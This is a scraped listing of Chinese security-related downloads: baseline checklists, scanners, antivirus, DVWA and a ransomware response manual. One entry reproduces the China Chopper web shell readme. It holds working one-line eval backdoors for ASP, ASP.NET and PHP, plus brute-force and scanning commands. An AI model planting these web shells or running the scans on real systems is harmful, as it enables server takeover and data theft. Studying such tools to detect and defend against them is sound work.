img
基线安全检查_网络安全检查表_V3.3.xls

完整的安全基线内容主要由三方面必须满足的最低要求组成:系统存在的安全漏洞、系统配置的脆弱性、系统状态的监控。安全基线通过安全合规管理机制判断用户的应用环境安全是否达标,提供一个信息系统所需的最基本的安全保证。 1、安全漏洞:漏洞通常是由于软件或协议等系统自身存在缺陷引起的安全风险,如系统登录漏洞、拒绝服务漏洞、缓冲区溢出、信息泄漏、蠕虫后门、恶意代码执行等,反映了系统自身的安全脆弱性; 2、安全配置:通常都是由于人为的疏忽造成,主要包括了账号、口令、授权、日志、IP协议等方面的配置要求,配置不当导致系统存在安全风险; 3、系统状态:包含系统端口状态、进程、账号、服务以及重要文件的变化。这些信息反映了系统当前所处环境的动态安全状况,存在的安全隐患将威胁系统运行安全。

img
基线安全检查_数据库安全检查表_V3.3.xls

完整的安全基线内容主要由三方面必须满足的最低要求组成:系统存在的安全漏洞、系统配置的脆弱性、系统状态的监控。安全基线通过安全合规管理机制判断用户的应用环境安全是否达标,提供一个信息系统所需的最基本的安全保证。 1、安全漏洞:漏洞通常是由于软件或协议等系统自身存在缺陷引起的安全风险,如系统登录漏洞、拒绝服务漏洞、缓冲区溢出、信息泄漏、蠕虫后门、恶意代码执行等,反映了系统自身的安全脆弱性; 2、安全配置:通常都是由于人为的疏忽造成,主要包括了账号、口令、授权、日志、IP协议等方面的配置要求,配置不当导致系统存在安全风险; 3、系统状态:包含系统端口状态、进程、账号、服务以及重要文件的变化。这些信息反映了系统当前所处环境的动态安全状况,存在的安全隐患将威胁系统运行安全。

img
devviewer.exe

You can gather the Device ID of device(s) to exclude using this tool。

img
2.3 Nmap、nessus等网络扫描工具的介绍和使用.exe

Nessus是一个功能强大而又易于使用的远程安全扫描器。安全扫描器的功能是对指定网络进行安全检查,找出该网络是否存在有导致对手攻击的安全漏洞。该系统被设计为client/sever模式,服务器端负责进行安全检查,客户端用来配置管理服务器端。在服务端还采用了plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。在Nessus中还采用了一个共享的信息接口,称之知识库,其中保存了前面进行检查的结果。检查的结果可以HTML、纯文本、LaTeX(一种文本文件格式)等几种格式保存。

img
sysdiag-full-5.0.34.12.exe火绒安全

火绒安全软件5.0专业尽职 极致低调 只为巩固安全防线简单易用,一键安装,大众用户即可获得安全防护 编写规则,分析病毒,电脑极客也能玩转其中 如病毒查杀、防护中心、访问控制、各类安全工 具等。让您对火绒安全软件基础功能的使用有所了解。满足您日常生活中的网络安全防护需 求。

img
大势至电脑文件防泄密系统v9.0单机版.rar

大势至USB端口管理软件介绍 大势至电脑USB端口管理软件是当前国内最强大的电脑文件安全管理软件,不仅可以完全禁止U盘、移动硬盘、手机等USB存储设备的使用,而且还不影响非USB存储设备(如USB鼠标键盘和加密狗);可以禁止光驱使用、禁用光驱刻录功能、禁用软驱;可以禁止电脑发送邮件附件、禁止网盘上传电脑文件、禁止QQ发送文件、禁止FTP文件上传等,防止通过网络途径泄露电脑机密的行为。同时,还可以禁止电脑随意安装软件、只让电脑运行某些程序;只让电脑打开某些网站或禁止电脑打开某些网站等,进一步规范电脑使用行为。此外,大势至电脑文件防泄密系统还可以禁止修改注册表、禁止修改组策略、禁止修改设备管理器……

img
mysql数据库文档生成工具

mysql数据库文档生成工具 可生成Word文档,选择表后一键生成。

img
phpCMS阿里漏洞.doc

phpCMS阿里漏洞补丁

img
dedeCMS阿里漏洞.doc

DeDeCMS阿里漏洞补丁

img
minifilter源码

资源中的是微软minifilter的原始代码,结构精简,学过滤驱动的朋友们可以参考下。相关文章在http://blog.csdn.net/arvon2012/article/details/7926366

img
2017中国菜刀过狗去后门[解压密码caidao].zip

免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任! ---------------------------------------------------------------------------------------------------------- 程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。 ---------------------------------------------------------------------------------------------------------- UINCODE方式编译,支持多国语言输入显示。 在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。 一、脚本客户端(包括但不限于EVAL)部分   1)基本信息    Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。    目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。    在服务端运行的代码如下:    PHP:    ASP: <%eval request("chopper")%>    ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> (注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)    Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。 此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。 随日期变化的连接密码, 服务端写法: Asp.NET: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%> PHP: @eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]); 例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper   2)几大功能    在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,    保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。    1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;    2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。    3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。 如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。 (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。 如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。 可以在官网下载别人的CCC脚本,或分享你的得意之作。    注意:由于服务器的安全设置,某些功能可能不能正常使用。   3) 配置信息填写说明 --------------------------------------------------------------------------------------- A) 数据库方面: ----------------------------------------------------------------------------- PHP脚本: 类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址 主机地址可为机器名或IP地址,如localhost 数据库用户 连接数据库的用户名,如root

数据库密码

连接数据库的密码,如123455 utf8 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1 ASP和ASP.NET脚本: 类型 类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。如MSSQL的配置信息为 Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize 脚本: 类型 类型只能填XDB 与Customize 脚本约定的配置信息 菜刀自带的Customize.jsp数据库参数填写方法如下(两行): MSSQL: com.microsoft.sqlserver.jdbc.SQLServerDriver jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL: com.mysql.jdbc.Driver jdbc:mysql://localhost/test?user=root&password=123456 ORACLE: oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:user/password@127.0.0.1:1521/test B) 其它方面: ----------------------------------------------------------------------------- 添加额外附加提交的数据,如ASP的新服务端是这样的: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SC")) o.run "ff",Server,Response,Request,Application,Session,Error %> 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。 提交功能前先POST额外的数据包:会话期间只提交一次。 https://maicaidao.com/cgi-bin/login.cgi uid=user1&pwd=123456 默认终端程序路径设置示例: /bin/sh 虚拟终端默认命令设置示例: whoami 文件管理默认打开的目录设置示例: c:\windows\temp\   3) HTTP登录验证 SHELL地址这样填 http://user:pass@maicaidao.com/server.asp 用户名密码中的特殊字符可用URL编码转换。 4) 数据导入:在SHELL列表界面,右键有一项菜单,可以把其它的菜刀库导入到当前分类中。 二、安全扫描   蜘蛛爬行,绑定域名查询,目录爆破。   命令解释: A) 查单一IP的绑定域名 {reverse_ip} {url:http://www.maicaidao.com/} B) 扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c} {url:http://www.maicaidao.com/} C) 只扫描本C段开放的WEB服务器 {reverse_ip_c} {url:http://www.maicaidao.com/} {port} D) 蜘蛛爬行 {spider} {url:http://www.maicaidao.com/} E) 蜘蛛爬行,并设定爬行范围 {spider} {url:http://www.maicaidao.com/} {range:maicaidao.com} F) 蜘蛛爬行,过滤重复URL加快速度 加上 {filter} G) 爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。 注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt} {crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt} {crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt} 三、定时提醒 当闹钟来用吧, 周期:每月/每周/每日/只一次。 四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是加密存储的。 五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。 如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。 六、其它部分 等待加入。 -------------------------------------------- 20110628版更新注意事项 缓存库最好重建一下。 -------------------------------------------- 文件说明: ------------------------------------------------------------------ chopper.exe 菜刀程序 db.mdb 菜刀的主数据库 ------------------------------------------------------------------ cache.tmp 菜刀的缓存数据库(可删除) readme.txt 你现在正在看的(可删除) 菜刀的自写脚本(可删除) Cu

img
慧连接客户端,远程接入。

慧连接客户端

img
5G安全报告(2020)

中国信息通信研究院和IMT-2020(5G)推进组,作为国内5G领域专业研究机构,结合前期工作基础及近期调研情况联合编制了本报告,系统地梳理了5G关键技术、典型应用场景及产业生态的安全风险,提出了安全理念和应对思路措施,并对后续加强各方互信合作,更好地推动5G发展与安全进行了展望和倡议。

img
DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。

img
ZAP_2_9_0_windows.exe

OWASP ZAP最新版本2.9.0,官网下载速度很慢,好不容易下载下来,分享一下大家一起使用,欢迎大家下载。

img
勒索病毒应急与响应手册

勒索病毒主要以邮件、程序木马、网页挂马的形式进行传播,利用各种非对称加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。勒索病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。 本手册第1 章详述如何判断是否已感染勒索病毒,是否已被加密;第2 章详述当主机处于不同的中毒阶段时,从基础措施和高级措施方向上,分别应如何进行应急响应;第3 章介绍对于已加密系统的五种处理方式,重要文件需要恢复应分别尝试备份还原、解密、数据恢复、支付解密,价值较低的文件可直接重装系统,并进行主机加固;第4 章详述如何进行勒索病毒的防治建议,包括五个基础措施和应用 终端检测与响应(EDR)产品。 通过应用本手册,在不同阶段及时做出响应,尽可能避免或降低损失。

img
Symantec_Endpoint_Protection_14.2.2_Win64-bit_Client_CS

Symantec_Endpoint_Protection_14.2.2_Win64-bit_Client_CS,赛门铁克14客户端,64位中文版,支持windows,内附CleanWipe卸载清理工具。

img
EN50129-2018新版的标准.zip

EN50129-2018新版的标准,很值得拥有。需要赶紧下载吧

img
PHP+Mysql 带SQL注入源码 下载

PHP+Mysql 带SQL注入源码、下载解压部署到环境中去就行了。

img
一键加网络验证客户端1.42_2019-2-18.zip

酷云一键加网络验证工具V1.4版本是一款非常简单好用的给EXE程序加验证的工具。功能强大,文档完善,推广给大家使用;